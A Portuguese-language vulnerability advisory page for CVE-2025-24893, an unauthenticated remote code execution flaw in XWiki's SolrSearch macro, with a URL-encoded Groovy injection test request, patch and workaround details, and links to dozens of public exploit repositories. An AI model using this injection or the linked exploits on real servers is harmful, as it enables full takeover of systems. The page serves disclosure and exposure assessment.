← voltar
CVE-2025-24893

Remote code execution as guest via SolrSearchMacros request in xwiki

CVSS 9.8 CRITICALEPSS 99.9%● KEVCWE-95
Em resumo

Qualquer visitante de um site XWiki pode executar código arbitrário no servidor sem fazer login, enviando uma requisição especialmente preparada para a função de busca. Isso compromete completamente a confidencialidade, integridade e disponibilidade de toda a instalação.

Detalhe técnico

A macro SolrSearch falha em sanitizar adequadamente o parâmetro `text` fornecido pelo usuário antes de avaliá-lo como código, permitindo que atacantes não autenticados injetem e executem código Groovy arbitrário no servidor. A vulnerabilidade existe no mecanismo de resposta que exibe o conteúdo do feed sem escapar adequadamente ou restringir o tipo de conteúdo.

Resumo gerado e traduzido por IA a partir da descrição oficial.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Produtos afetados
xwiki · xwiki-platform
PoCs públicas encontradas41
githubgithub.com/gunzf0x/CVE-2025-2489322githubgithub.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC17githubgithub.com/b0ySie7e/CVE-2025-2489311githubgithub.com/iSee857/CVE-2025-24893-PoC10githubgithub.com/Infinit3i/CVE-2025-248936githubgithub.com/Hex00-0x4/CVE-2025-24893-XWiki-RCE6githubgithub.com/AliElKhatteb/CVE-2024-32019-POC5githubgithub.com/hackersonsteroids/cve-2025-248935githubgithub.com/D3Ext/CVE-2025-248934githubgithub.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc3githubgithub.com/torjan0/xwiki_solrsearch-rce-exploit2githubgithub.com/BreakingRohit/CVE-2025-24893-PoC2githubgithub.com/Artemir7/CVE-2025-24893-EXP2githubgithub.com/Th3Gl0w/CVE-2025-24893-POC1githubgithub.com/IIIeJlyXaKapToIIIKu/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch1githubgithub.com/x0da6h/POC-for-CVE-2025-248931githubgithub.com/80Ottanta80/CVE-2025-24893-PoC1githubgithub.com/vasilysaint/CVE-2025-248931githubgithub.com/alaxar/CVE-2025-248930githubgithub.com/zs1n/CVE-2025-248930githubgithub.com/Retro023/CVE-2025-24893-POC0githubgithub.com/CMassa/CVE-2025-248930githubgithub.com/Fomovet/cve-2025-248930githubgithub.com/ibadovulfat/CVE-2025-248930githubgithub.com/gmh5225/CVE-2025-24893-RCE-PoC0githubgithub.com/AzureADTrent/CVE-2025-24893-Reverse-Shell0githubgithub.com/andwati/CVE-2025-248930githubgithub.com/Bishben/xwiki-15.10.8-reverse-shell-cve-2025-248930githubgithub.com/kimtangker/CVE-2025-248930githubgithub.com/investigato/cve-2025-24893-poc0githubgithub.com/The-Red-Serpent/CVE-2025-248930githubgithub.com/0xDTC/XWiki-Platform-RCE-CVE-2025-248930githubgithub.com/o0wo0o/CVE-2025-24893_Shell0githubgithub.com/dhiaZnaidi/CVE-2025-24893-PoC0githubgithub.com/TomKingori/xwiki-cve-2025-24893-exploit0githubgithub.com/nohack1212/CVE-2025-24893-0githubgithub.com/rippsec/CVE-2025-24893-XWiki-SSTI-RCE0githubgithub.com/hasecto/CVE-2025-248930githubgithub.com/mah4nzfr/CVE-2025-248930exploitdbwww.exploit-db.com/exploits/52429não verificadoexploitdbwww.exploit-db.com/exploits/52136não verificado
⚠ Recursos públicos, para você avaliar a exposição de sistemas que controla ou está autorizado a testar. Teste apenas com autorização.

Quer saber se a sua infraestrutura está exposta a isto?

Falar com a TrueHacking →
Referências
https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-ui/src/main/resources/Main/SolrSearchMacros.xml#L955https://github.com/xwiki/xwiki-platform/blob/67021db9b8ed26c2236a653269302a86bf01ef40/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/macros.vm#L2824https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562jhttps://jira.xwiki.org/browse/XWIKI-22149https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24893